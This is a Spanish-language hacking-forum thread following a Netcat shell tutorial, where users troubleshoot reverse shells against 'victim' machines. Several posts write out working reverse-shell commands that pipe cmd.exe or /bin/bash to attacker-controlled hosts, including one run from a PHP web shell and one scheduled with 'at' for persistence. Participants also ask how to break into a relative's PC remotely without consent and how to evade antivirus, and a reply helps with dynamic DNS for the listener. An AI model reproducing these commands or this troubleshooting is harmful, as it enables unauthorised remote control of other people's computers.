 Autor
|
Tema: Paper: Obtener shell con Netcat (Leído 59078 veces)
|
Naitse
 Desconectado
Mensajes: 9
|
buenass, estuve leyendo las 12 hojas que tiene este post y que sobrevivio muuuuucho tiempo  , la verdad que impecable... pero tengo una duda existencial desde que empece hace solo 3 dias con esto a leer y bajar exloits demas sigo sin poder saber si se puede hacer sin estar ahi o sin que este el usuario del otro lado para no marearlos.... Como obtengo shell de un equipo con windoze XP SP2 sin estar fisicamente cerca, o sea porque en este tutorial es necesario instalar por ejemplo en la victima un NC a la escucha... ahora, como entro en primer lugar a la victima para istalar el nc??? sin usar truyanos obvio porque hoy dia todos los antivirus los detectan y tambien me gustaria descartar el factor "Usuario" del otro lado, yo quiero entrar a la victima sin necesidad de estar fisicamente alli abriedo puertos o sin que un usuario me acepte un troyano. es posible eso? para que les sea mas clara la situacion: Casa de mi tia esta la PC encendida, quiero obtener shell desde mi casa, pero no hay nadie frente a la PC victima y yo estoy a 50 km jaja y claro que tampoco le puedo pedir a mi tia que me instale nada. se puede hacer eso?, se puede uno meter en un XP sp2 de una? existe un exploit o algo para eso?  estoy facinado con el tema de seguridad informatica pero me doy cuenta que en realidad tratar de entrar a un equipo sin la participacion del usuario desde el otro lado es muy dificil, o me estoy equibocando?? no quiero bajar webs ni nada solo quiero saltearme el sistema de seguridad del xp ya linux es otro mundo, solo una shell de cualquier sistema de bill tal ves pido mucho, me podrian orientar?? |
|
|
|
|
En línea
|
|
|
|
GroK
Desconectado
Mensajes: 594
...I have become comfortably numb...
|
|
|
|
|
|
En línea
|
"I put on my Hendrix album and my son said 'Dad, who's that?' and i said 'Well son, that's God' "- Robert Plant
|
|
|
likeu
Desconectado
Mensajes: 76
¡Amo YaBB SE!
|
estaria bueno una version imprimible del PDF asi lo puedo "Manualizar" para mi bibliotequita :p
Likeu!
|
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
|
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
vene_cindy
Desconectado
Mensajes: 2
|
Ayuda con la Reverse Shell por favor Anelkaos o shyzura
la reverse shell si me funciona que es esta:
nc -vv -L -p 6000 ----> Atacante
nc -d -e cmd.exe ip.ip.ip.ip 6000 ----> Victima
el ejemplo anterior si funciona perfecta por lo tanto si me da la reverse shell....
pero cuando la quiero voltear es decir esto:
nc -vv -L -p 80 ----> Atacante
nc -vv -L -p 25 ----> Atacante
nc ip.ip.ip.ip 80 | cmd.exe | nc ip.ip.ip.ip 25 --->Victima
ó
nc -vv ip.ip.ip.ip 80 | cmd.exe | nc -vv ip.ip.ip.ip 25 --->Victima
NO FUNCIONA LO HE INTENTADO EN LAS CARPETAS, SYSTEM, SYSTEM32, WINDOWS Y NADA ??? QUE ESTARA PASANDO NO FUNCIONA POR FAVOR SI ALGUIEN ME PUEDE EXPLICAR Y SABE CUAL ES EL ERROR RESPONDA
DA COMO ERROR ESTO:
DNS fwd/ rev mismatch: dom.homelinux.com != dc8546b83.dslam-04-4-11-02-2-02.pdm.dsl.cantv.net
dom.homelinux.com [ip.ip.ip.ip] 80 (http) open
DNS fwd/ rev mismatch: dom.homelinux.com != site-redirect.dyndns.com
dom.homelinux.com [ip.ip.ip.ip] 25 (http) open
sent 0, rcvd 0: NOTSOCK
ESO ES EL ERROR QUE ME DA USANDO UN DOMINIO Ó USANDO MI IP DIRECTAMENTE DE CUALQUIERA DE LAS DOS FORMAS NO LOGRO VOLTEAR LA SHELL. ESPERO QUE ALGUIEN ME RESPONDA Y ME DIGA EL ERROR????
|
|
|
|
|
En línea
|
|
|
|
vene_cindy
Desconectado
Mensajes: 2
|
Ayuda con la Reverse Shell por favor Anelkaos o shyzura
la reverse shell si me funciona que es esta:
nc -vv -L -p 6000 ----> Atacante
nc -d -e cmd.exe ip.ip.ip.ip 6000 ----> Victima
el ejemplo anterior si funciona perfecta por lo tanto si me da la reverse shell....
pero cuando la quiero voltear es decir esto:
nc -vv -L -p 80 ----> Atacante
nc -vv -L -p 25 ----> Atacante
nc ip.ip.ip.ip 80 | cmd.exe | nc ip.ip.ip.ip 25 --->Victima
ó
nc -vv ip.ip.ip.ip 80 | cmd.exe | nc -vv ip.ip.ip.ip 25 --->Victima
NO FUNCIONA LO HE INTENTADO EN LAS CARPETAS, SYSTEM, SYSTEM32, WINDOWS Y NADA ??? QUE ESTARA PASANDO NO FUNCIONA POR FAVOR SI ALGUIEN ME PUEDE EXPLICAR Y SABE CUAL ES EL ERROR RESPONDA
DA COMO ERROR ESTO:
DNS fwd/ rev mismatch: dom.homelinux.com != dc8546b83.dslam-04-4-11-02-2-02.pdm.dsl.cantv.net
dom.homelinux.com [ip.ip.ip.ip] 80 (http) open
DNS fwd/ rev mismatch: dom.homelinux.com != site-redirect.dyndns.com
dom.homelinux.com [ip.ip.ip.ip] 25 (http) open
sent 0, rcvd 0: NOTSOCK
ESO ES EL ERROR QUE ME DA USANDO UN DOMINIO Y CUANDO COLOCO EL IP ME DA ESTE ERROR:
dc8546b83.dslam-04-4-11-02-2-02.pdm.dsl.cantv.net [ip.ip.ip.ip] 80 (http) open
dc8546b83.dslam-04-4-11-02-2-02.pdm.dsl.cantv.net [ip.ip.ip.ip] 25 (https): TIMEDOUT
sent 0, rcvd 0: NOTSOCK
|
|
|
|
|
En línea
|
|
|
|
|
|
drinchineda
Desconectado
Mensajes: 3
|
Zhyzura MUY BUEN MANUAL DEL NETCAT, no lo he probado pero lo entendi a la perfeccion.
una pregunta, a la hora de pone el netcat en el equipo de la victima el antivirus (panda, norton, avast, nod32, entre otros) no lo detecta y lo elimina?
si es asi q se puede hacer para q no lo detecte!!!
|
|
|
|
|
En línea
|
|
|
|
drinchineda
Desconectado
Mensajes: 3
|
zhyzura ya pude manejar el netcat bien pero por conexion directa. Me parece muy bueno lo de REVERSE SHELL pero tengo un problema, si yo estoy en una red interna pues mapeo el puerto a mi ip, pero el problema es que el prestador de internet de mi sector pone IPs dinamicas osea q cada dia mi ip cambia.
como puedo hacer para hacer una Reverse Shell sabiendo q mi ip cambia cada dia!!!!
Gracias!!
|
|
|
|
|
En línea
|
|
|
|
dreiverx1
Desconectado
Mensajes: 2
|
wnas, k algien me ayude no me funciona la reverse shell, utilizo winxp sp2, i tengo router sera algo de eso? ayuda plz
|
|
|
|
|
En línea
|
|
|
|
makiolo
Desconectado
Mensajes: 9
|
Buenas ... Tengo una shell , (una shell limitada pero una shell) , de un linux a través de php. La victima no tiene netcat , asi que he intentado esto: telnet MIIP 80 | /bin/bash | telnet MIIP 443 > /dev/null 2>&1 En mis 2 netcats que estan en listening recibo una conexión y desconexión inmediata. Como que funciona pero a lo mejor algun sistema de seguridad del servidor detecta que pasa una shell por el cable y plof me desconecta. Parece ser que puedo ejecutar muchos comandos interesantes , demasiados teniendo en cuenta que soy "apache". Por cierto los comandos que ejecuto desde shell_exec() se logean ? Supongo que si ,,, ¿/var/logs/? Edito: El mensaje que me devuelve es : $ telnet MIIP 80 | /bin/bash | telnet MIIP 443
Trying MIIP...
Connected to MIIP.
Escape character is '^]'.
/bin/bash: /root/.bashrc: Permiso denegado
/bin/bash: line 1: Trying: command not found
/bin/bash: line 2: Connected: command not found
Connection closed by foreign host.
/bin/bash: line 3: Escape: command not found
Connection closed by foreign host. |
|
|
|
« Última modificación: 09 Enero 2007, 17:21 por makiolo »
|
En línea
|
|
|
|
|
fitu
|
Muy buen manual zhyzura  Pero me surge un "problema" cuando modifico el registro con la siguiente linea "at xx:xx nc -d xxx.xxx.xxx.xxx 80|cmd.exe|nc -d xxx.xxx.xxx.xxx 25" y se cumple la hora solo me hace la shell en el puerto 80  , no pasa nada con la del 25? pq sera? |
|
|
|
|
En línea
|
|
|
|
GroK
Desconectado
Mensajes: 594
...I have become comfortably numb...
|
@drinchineda:Si tienes IP dinamica usa algun servicio de DNS como No-ip ( www.no-ip.com), es muy intuitivo pero si tienes dudas aki tienes un manual -> http://foro.elhacker.net/index.php/topic,57735.0.html; una vez la tengas en vez de poner la IP en el netcat pones tu DNS y listo ^^ @dreiverx1Revisa las puertos de tu router, osea asegurate de abrir el/los puerto/s que estas utilizando para el netcat; asimismo comprueba cualkier firewall que tengas instalado (incluyendo el de Windows) y dale permiso. Si tienes dudas aki hay un buen manual para mapear puertos en el router -> http://foro.elhacker.net/index.php/topic,91300.0.html@fituPonlo asi a ver si rula: at xx:xx "nc -d xxx.xxx.xxx.xxx 80|cmd.exe|nc -d xxx.xxx.xxx.xxx 25" Saludos
|
|
|
|
|
En línea
|
"I put on my Hendrix album and my son said 'Dad, who's that?' and i said 'Well son, that's God' "- Robert Plant
|
|
|
|
fitu
|
ok ahora pruebo gracias por responder |
|
|
|
|
En línea
|
|
|
|
dreiverx1
Desconectado
Mensajes: 2
|
Gracias Grok por responder  , pero tengo los puertos del router abiertos y tambien todo bien configurado con muy antivirus y con el de windows e incluso esta desactivado a pesar de haverle puesto k abriera los puertos..:S no se k puede ser, si algien lo sabe ayuda plz |
|
|
|
|
En línea
|
|
|
|
|
 |
